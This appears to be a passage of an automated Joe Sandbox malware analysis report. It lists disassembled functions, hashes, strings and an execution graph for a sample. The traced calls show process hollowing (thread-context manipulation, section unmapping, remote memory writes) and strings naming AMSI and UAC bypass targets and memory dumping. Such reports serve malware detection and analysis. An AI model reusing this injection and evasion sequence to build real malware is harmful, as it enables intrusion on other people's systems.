                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                          • API String ID: 0-484625025
                                                                                          • Opcode ID: b59079619c82e29834a3a9959f6a55ff3ea20f6f2969759e2ca5ae5704778059
                                                                                          • Instruction ID: 12dbc076fba424cf86c23ef9402188ffac7dbab2ba9c3257b712078761804c52
                                                                                          • Opcode Fuzzy Hash: b59079619c82e29834a3a9959f6a55ff3ea20f6f2969759e2ca5ae5704778059
                                                                                          • Instruction Fuzzy Hash: F351F531A40219BAEB11BAA4EC95FAE73F8EF18340F1004B9D604A7181E771BF45CF69
                                                                                          Function 2A116940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                          • Instruction ID: c4b0928c3c921049a0b54515026d98e1bf52a5a5722e9c3a8fc96e9bf0bf5645
                                                                                          • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                          • Instruction Fuzzy Hash: 3B0204B1509341AFC344DF18C990A6BBBE5EFC8724F018A6DF9958B255DB32EA05CB42
                                                                                          Function 2A08B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: __aulldvrm
                                                                                          • String ID: +$-$0$0
                                                                                          • API String ID: 1302938615-699404926
                                                                                          • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                          • Instruction ID: 271531818ca57fae13654f2e81c852ecb00579e6638d2c4c88dc448a4892adaf
                                                                                          • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                          • Instruction Fuzzy Hash: 5D81F1B0E412099EDB14BF68D890BEEBBF1AF47350F15423ADA60A7292C7349951CB58
                                                                                          Function 2A0F20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: ___swprintf_l
                                                                                          • String ID: %%%u$[$]:%u
                                                                                          • API String ID: 48624451-2819853543
                                                                                          • Opcode ID: ddd2531232f774567b3b8140064517b3206cb71c1459214243a4d73d85b09bca
                                                                                          • Instruction ID: 35a19ddcebc0a8febb4f74a363c7bde0885b6b366f416ca2254a4daa05987598
                                                                                          • Opcode Fuzzy Hash: ddd2531232f774567b3b8140064517b3206cb71c1459214243a4d73d85b09bca
                                                                                          • Instruction Fuzzy Hash: C7215676900119ABCB10EE69DC909FEBBE8EF6C640F050565EA05E3201EB30DA419BD5
                                                                                          Function 2A06F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 2A0B02BD
                                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 2A0B02E7
                                                                                          • RTL: Re-Waiting, xrefs: 2A0B031E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                          • API String ID: 0-2474120054
                                                                                          • Opcode ID: 5e7f42a3efbaffaba6fd994587fdca23fc774fe2ce5af9be2c0ec5d48764cb35
                                                                                          • Instruction ID: 502eb188de22de28e0e542f5582f961b2c26a41b7b8b1d295157444cec71b8f5
                                                                                          • Opcode Fuzzy Hash: 5e7f42a3efbaffaba6fd994587fdca23fc774fe2ce5af9be2c0ec5d48764cb35
                                                                                          • Instruction Fuzzy Hash: CAE1C1706087419FD320EF28D980F5AB7E0BF84B68F104A6EF5A58B2E1D775DA44CB42
                                                                                          Function 2A07BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • RTL: Resource at %p, xrefs: 2A0B7B8E
                                                                                          • RTL: Re-Waiting, xrefs: 2A0B7BAC
                                                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 2A0B7B7F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                          • API String ID: 0-871070163
                                                                                          • Opcode ID: 9a69ee7849e95a4d3903ead093e779945e5e460f554079c783487e97e74f2c29
                                                                                          • Instruction ID: 5f280e2d0582822fb5bcdd449691cb81a52a590b26cfc9c68c917d9e29e2180c
                                                                                          • Opcode Fuzzy Hash: 9a69ee7849e95a4d3903ead093e779945e5e460f554079c783487e97e74f2c29
                                                                                          • Instruction Fuzzy Hash: D841F1313057029FC720EE25DD40F5AB7E5EF99B20F000A2DFA5ADB281DB71E9158B95
                                                                                          Function 2A07B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2A0B728C
                                                                                          Strings
                                                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 2A0B7294
                                                                                          • RTL: Resource at %p, xrefs: 2A0B72A3
                                                                                          • RTL: Re-Waiting, xrefs: 2A0B72C1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                          • API String ID: 885266447-605551621
                                                                                          • Opcode ID: 017e04ae535406ce231b9c749b8bf5223f8868f0e6ae8b91a5e83fbf3cae8603
                                                                                          • Instruction ID: 396e276c63953f3f7eaa9ff7774a4eb995beaba6868b829bf0499d62340f3f30
                                                                                          • Opcode Fuzzy Hash: 017e04ae535406ce231b9c749b8bf5223f8868f0e6ae8b91a5e83fbf3cae8603
                                                                                          • Instruction Fuzzy Hash: E5410F31641216ABC710EE24CD80F5AB7E5FB65710F100A29FA55AB641EB31F9068BD5
                                                                                          Function 2A0F2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: ___swprintf_l
                                                                                          • String ID: %%%u$]:%u
                                                                                          • API String ID: 48624451-3050659472
                                                                                          • Opcode ID: 4df0fdae7d3a1c4906256ef2ec941e113d2dc404e54856695fd840be401d4e61
                                                                                          • Instruction ID: d0789402ede92edeae74b0212b3d66070b2c890b76aecffe200a507c028d5896
                                                                                          • Opcode Fuzzy Hash: 4df0fdae7d3a1c4906256ef2ec941e113d2dc404e54856695fd840be401d4e61
                                                                                          • Instruction Fuzzy Hash: 6C318672A006199FDB50EF28DC40BEEB7F8EB48610F4545A5ED49E3201EF30EA449BA0
                                                                                          Function 2A087D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: __aulldvrm
                                                                                          • String ID: +$-
                                                                                          • API String ID: 1302938615-2137968064
                                                                                          • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                          • Instruction ID: 96797a6cbe6e365653229dc5b04d28e43ae3964c79240fa6689e8fcdf76b0143
                                                                                          • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                          • Instruction Fuzzy Hash: 1691B6F0E00219DFDB14EF69D890AAEB7F5AF44360F11453AE954E72CADB70A9508B18
                                                                                          Function 2A049126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $$@
                                                                                          • API String ID: 0-1194432280
                                                                                          • Opcode ID: 7a2090df976c3dc25ce2b986f36c9de68792a72ea8eb93ef36095766b5f5a6e6
                                                                                          • Instruction ID: 12d47620b4054f99338b1883d38466e65b41e7e5ef2107cde9eb7954387237f3
                                                                                          • Opcode Fuzzy Hash: 7a2090df976c3dc25ce2b986f36c9de68792a72ea8eb93ef36095766b5f5a6e6
                                                                                          • Instruction Fuzzy Hash: 89813872D012699BDB219BA4CC44BDEB7B4BB08750F0141FAEA19B7251D7309E808FA0

                                                                                          Execution Graph

                                                                                          Execution Coverage:9.3%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:187
                                                                                          Total number of Limit Nodes:17
                                                                                          execution_graph 24304 2871727 24305 287173c 24304->24305 24306 2871968 24304->24306 24307 287174e 24305->24307 24319 28717cb Sleep 24305->24319 24308 2871938 24306->24308 24309 2871a80 24306->24309 24310 287175d 24307->24310 24315 287182c 24307->24315 24320 287180a Sleep 24307->24320 24313 2871947 Sleep 24308->24313 24318 2871986 24308->24318 24311 2871684 VirtualAlloc 24309->24311 24312 2871a89 24309->24312 24314 28716af 24311->24314 24321 28716bf 24311->24321 24317 287195d Sleep 24313->24317 24313->24318 24328 2871644 24314->24328 24327 2871838 24315->24327 24334 28715cc 24315->24334 24317->24308 24323 28715cc VirtualAlloc 24318->24323 24326 28719a4 24318->24326 24319->24307 24322 28717e4 Sleep 24319->24322 24320->24315 24324 2871820 Sleep 24320->24324 24322->24305 24323->24326 24324->24307 24329 2871681 24328->24329 24330 287164d 24328->24330 24329->24321 24330->24329 24331 287164f Sleep 24330->24331 24332 2871664 24331->24332 24332->24329 24333 2871668 Sleep 24332->24333 24333->24330 24338 2871560 24334->24338 24336 28715d4 VirtualAlloc 24337 28715eb 24336->24337 24337->24327 24339 2871500 24338->24339 24339->24336 24340 2871a8f 24341 2871aa1 24340->24341 24342 2871b6c 24340->24342 24344 2871aa7 24341->24344 24347 2871b13 Sleep 24341->24347 24343 28716e8 24342->24343 24342->24344 24346 2871c66 24343->24346 24348 2871644 2 API calls 24343->24348 24345 2871ab0 24344->24345 24350 2871b4b Sleep 24344->24350 24353 2871b81 24344->24353 24347->24344 24349 2871b2d Sleep 24347->24349 24351 28716f5 VirtualFree 24348->24351 24349->24341 24352 2871b61 Sleep 24350->24352 24350->24353 24354 287170d 24351->24354 24352->24344 24355 2871c00 VirtualFree 24353->24355 24356 2871ba4 24353->24356 24357 289bb50 timeSetEvent 24358 289bb44 24361 288ec74 24358->24361 24362 288ec7c 24361->24362 24362->24362 26716 288870c LoadLibraryW 24362->26716 24364 288ec9e 24365 288eca3 24364->24365 24366 288ecad 24365->24366 24367 288ecb3 24366->24367 24368 288ecc8 24367->24368 24369 288ecb7 24367->24369 24370 2874500 8 API calls 24368->24370 26730 2874500 24369->26730 24372 288ecc6 24370->24372 26721 287480c 24372->26721 26736 28880c8 26716->26736 26718 2888745 26744 2887d00 26718->26744 26722 287481d 26721->26722 26723 2874843 26722->26723 26724 287485a 26722->26724 26725 2874b78 8 API calls 26723->26725 26726 2874570 8 API calls 26724->26726 26727 2874850 26725->26727 26726->26727 26728 287488b 26727->26728 26729 2874500 8 API calls 26727->26729 26729->26728 26731 2874504 26730->26731 26734 2874514 26730->26734 26733 2874570 8 API calls 26731->26733 26731->26734 26732 2874542 26732->24372 26733->26734 26734->26732 26735 2872c2c 8 API calls 26734->26735 26735->26732 26737 2874500 8 API calls 26736->26737 26738 28880ed 26737->26738 26755 2887914 26738->26755 26740 28880fa 26741 288811a GetProcAddress GetProcAddress 26740->26741 26759 28744d0 26741->26759 26745 2874500 8 API calls 26744->26745 26746 2887d25 26745->26746 26747 2887914 8 API calls 26746->26747 26748 2887d32 26747->26748 26797 2888020 26748->26797 26751 28880c8 10 API calls 26752 2887d5b NtWriteVirtualMemory 26751->26752 26753 28744d0 8 API calls 26752->26753 26754 2887d94 FreeLibrary 26753->26754 26754->24364 26756 2887925 26755->26756 26763 2874b78 26756->26763 26758 2887935 26758->26740 26761 28744d6 26759->26761 26760 28744fc 26760->26718 26761->26760 26762 2872c2c 8 API calls 26761->26762 26762->26761 26764 2874b85 26763->26764 26768 2874bb5 26763->26768 26767 2874b91 26764->26767 26769 2874570 26764->26769 26767->26758 26774 28744ac 26768->26774 26770 2874574 26769->26770 26771 2874598 26769->26771 26778 2872c10 26770->26778 26771->26768 26773 2874581 26773->26768 26775 28744b2 26774->26775 26776 28744cd 26774->26776 26775->26776 26788 2872c2c 26775->26788 26776->26767 26779 2872c27 26778->26779 26781 2872c14 26778->26781 26779->26773 26780 2872c1e 26780->26773 26781->26780 26782 2872d19 26781->26782 26786 28764cc TlsGetValue 26781->26786 26787 2872ce8 7 API calls 26782->26787 26785 2872d3a 26785->26773 26786->26782 26787->26785 26789 2872c3a 26788->26789 26790 2872c30 26788->26790 26789->26776 26790->26789 26791 2872d19 26790->26791 26795 28764cc TlsGetValue 26790->26795 26796 2872ce8 7 API calls 26791->26796 26794 2872d3a 26794->26776 26795->26791 26796->26794 26798 2874500 8 API calls 26797->26798 26799 2888043 26798->26799 26800 2887914 8 API calls 26799->26800 26801 2888050 26800->26801 26802 28880c8 10 API calls 26801->26802 26803 2888069 GetModuleHandleA 26802->26803 26804 28744ac 8 API calls 26803->26804 26805 2887d55 26804->26805 26805->26751 26806 2874e88 26807 2874e95 26806->26807 26811 2874e9c 26806->26811 26812 2874be4 26807->26812 26815 2874bfc 26811->26815 26813 2874bdc 26812->26813 26814 2874be8 SysAllocStringLen 26812->26814 26813->26811 26814->26813 26816 2874c02 SysFreeString 26815->26816 26817 2874c08 26815->26817 26816->26817 26818 2876518 26819 2876523 26818->26819 26822 2874168 26819->26822 26821 287655d 26823 28741ae 26822->26823 26824 287422c 26823->26824 26834 2874100 26823->26834 26824->26821 26826 28743e9 26824->26826 26829 28743fa 26824->26829 26839 287432c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 26826->26839 26828 28743f3 26828->26829 26830 287443f FreeLibrary 26829->26830 26831 2874463 26829->26831 26830->26829 26832 2874472 ExitProcess 26831->26832 26833 287446c 26831->26833 26833->26832 26835 2874143 26834->26835 26836 2874110 26834->26836 26835->26824 26836->26835 26838 28715cc VirtualAlloc 26836->26838 26840 2875814 26836->26840 26838->26836 26839->26828 26841 2875824 GetModuleFileNameA 26840->26841 26843 2875840 26840->26843 26844 2875a78 GetModuleFileNameA RegOpenKeyExA 26841->26844 26843->26836 26845 2875afb 26844->26845 26846 2875abb RegOpenKeyExA 26844->26846 26862 28758b4 6 API calls 26845->26862 26846->26845 26847 2875ad9 RegOpenKeyExA 26846->26847 26847->26845 26849 2875b84 lstrcpyn GetThreadLocale GetLocaleInfoA 26847->26849 26853 2875c9e 26849->26853 26854 2875bbb 26849->26854 26850 2875b20 RegQueryValueExA 26851 2875b62 RegCloseKey 26850->26851 26852 2875b40 RegQueryValueExA 26850->26852 26851->26843 26852->26851 26855 2875b5e 26852->26855 26853->26843 26854->26853 26856 2875bcb lstrlen 26854->26856 26855->26851 26857 2875be3 26856->26857 26857->26853 26858 2875c30 26857->26858 26859 2875c08 lstrcpyn LoadLibraryExA 26857->26859 26858->26853 26860 2875c3a lstrcpyn LoadLibraryExA 26858->26860 26859->26858 26860->26853 26861 2875c6c lstrcpyn LoadLibraryExA 26860->26861 26861->26853 26862->26850 26863 2874c48 26864 2874bdc 26863->26864 26865 2874c0c 26863->26865 26865->26864 26866 2874c12 SysFreeString 26865->26866 26866->26864

                                                                                          Executed Functions

                                                                                          Function 02888BAE Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 7653 2888bae-2888bb3 7655 2888bb8-2888bbd 7653->7655 7655->7655 7656 2888bbf-2888ca6 call 287493c call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 7655->7656 7687 2888cac-2888d87 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 7656->7687 7688 288a6f7-288a761 call 28744d0 * 2 call 2874c0c call 28744d0 call 28744ac call 28744d0 * 2 7656->7688 7687->7688 7731 2888d8d-28890b5 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 28730d4 * 2 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 2874d8c call 2874d9c call 28885dc 7687->7731 7840 2889128-2889449 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 28746a4 * 2 call 2888824 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 2872ee0 call 2872f08 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 GetThreadContext 7731->7840 7841 28890b7-2889123 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 7731->7841 7840->7688 7949 288944f-28896b2 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 2888254 7840->7949 7841->7840 8022 28896b8-2889821 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 28884c4 7949->8022 8023 28899bf-2889a2a call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 7949->8023 8114 288984b-28898b6 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 8022->8114 8115 2889823-2889849 call 28879b4 8022->8115 8048 2889a30-2889bb0 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 28879b4 8023->8048 8049 2889a2b call 2888824 8023->8049 8048->7688 8154 2889bb6-2889caf call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 2888ac0 8048->8154 8049->8048 8122 28898bc-28899bd call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 28879b4 8114->8122 8152 28898b7 call 2888824 8114->8152 8115->8122 8122->8048 8152->8122 8205 2889cb1-2889cfe call 28889b8 call 28889ac 8154->8205 8206 2889d03-288a6f2 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 2887d00 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 2887d00 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 SetThreadContext NtResumeThread call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 2872c2c call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 28887a0 * 3 call 287480c call 287494c call 28746a4 call 2874798 call 287494c call 28746a4 call 2888824 call 28887a0 * 2 call 287480c call 287494c call 2874798 call 287494c call 28887a0 call 287480c call 287494c call 2874798 call 287494c call 28887a0 * 5 call 287480c call 287494c call 2874798 call 287494c call 28887a0 call 287480c call 287494c call 2874798 call 287494c call 28887a0 call 287480c call 287494c call 2874798 call 287494c call 28887a0 call 287480c call 287494c call 2874798 call 287494c call 28887a0 call 2887ed4 call 28887a0 * 2 8154->8206 8205->8206 8206->7688
                                                                                          APIs
                                                                                            • Part of subcall function 02888824: FreeLibrary.KERNEL32(028D1384,00000000,028D1388,Function_000055D8,00000004,028D1398,028D1388,05F5E0FF,00000040,028D139C,028D1384,00000000,00000000,00000000,00000000,0288890B), ref: 028888EB
                                                                                            • Part of subcall function 028885DC: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02888668
                                                                                          • GetThreadContext.KERNEL32(028D13D0,028D1420,ScanString,028D13A4,0288A77C,UacInitialize,028D13A4,0288A77C,ScanBuffer,028D13A4,0288A77C,ScanBuffer,028D13A4,0288A77C,UacInitialize,028D13A4), ref: 02889442
                                                                                            • Part of subcall function 02888254: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 028882C5
                                                                                            • Part of subcall function 028884C4: NtUnmapViewOfSection.NTDLL(?,?), ref: 02888529
                                                                                            • Part of subcall function 028879B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02887A27
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1943250573.0000000002871000.00000020.00001000.00020000.00000000.sdmp, Offset: 02871000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2871000_Lwnkboxd.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryVirtual$AllocateContextCreateFreeLibraryProcessReadSectionThreadUnmapUserView
                                                                                          • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                          • API String ID: 3386062106-51457883
                                                                                          • Opcode ID: 40d71927330bc379f29349049f94ec996cc097ec855a43c506e70c6c5d496068
                                                                                          • Instruction ID: 35c2f8f8f8d3c4efbe6dfc9c319832aeb8a77bde75feb22805ed047b09b5a217
                                                                                          • Opcode Fuzzy Hash: 40d71927330bc379f29349049f94ec996cc097ec855a43c506e70c6c5d496068
                                                                                          • Instruction Fuzzy Hash: 39E21B3CB501189BDB15FBA8DC90BDE73BAAF88310F1040A2E149EB255DB74EE459F52
                                                                                          Function 02875A78 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 184registrystringlibraryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 8509 2875a78-2875ab9 GetModuleFileNameA RegOpenKeyExA 8510 2875afb-2875b3e call 28758b4 RegQueryValueExA 8509->8510 8511 2875abb-2875ad7 RegOpenKeyExA 8509->8511 8516 2875b62-2875b7c RegCloseKey 8510->8516 8517 2875b40-2875b5c RegQueryValueExA 8510->8517 8511->8510 8512 2875ad9-2875af5 RegOpenKeyExA 8511->8512 8512->8510 8514 2875b84-2875bb5 lstrcpyn GetThreadLocale GetLocaleInfoA 8512->8514 8518 2875c9e-2875ca5 8514->8518 8519 2875bbb-2875bbf 8514->8519 8517->8516 8520 2875b5e 8517->8520 8521 2875bc1-2875bc5 8519->8521 8522 2875bcb-2875be1 lstrlen 8519->8522 8520->8516 8521->8518 8521->8522 8523 2875be4-2875be7 8522->8523 8524 2875bf3-2875bfb 8523->8524 8525 2875be9-2875bf1 8523->8525 8524->8518 8527 2875c01-2875c06 8524->8527 8525->8524 8526 2875be3 8525->8526 8526->8523 8528 2875c30-2875c32 8527->8528 8529 2875c08-2875c2e lstrcpyn LoadLibraryExA 8527->8529 8528->8518 8530 2875c34-2875c38 8528->8530 8529->8528 8530->8518 8531 2875c3a-2875c6a lstrcpyn LoadLibraryExA 8530->8531 8531->8518 8532 2875c6c-2875c9c lstrcpyn LoadLibraryExA 8531->8532 8532->8518
                                                                                          APIs
                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 02875A94
                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02875AB2
                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02875AD0
                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02875AEE
                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,02875B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02875B37
